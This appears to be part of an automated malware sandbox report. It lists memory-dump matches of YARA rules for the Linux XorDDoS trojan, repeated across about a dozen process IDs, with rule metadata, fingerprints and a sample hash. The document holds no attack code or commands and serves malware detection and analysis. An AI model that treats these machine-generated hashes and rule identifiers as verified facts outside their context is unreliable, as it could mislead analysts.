        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
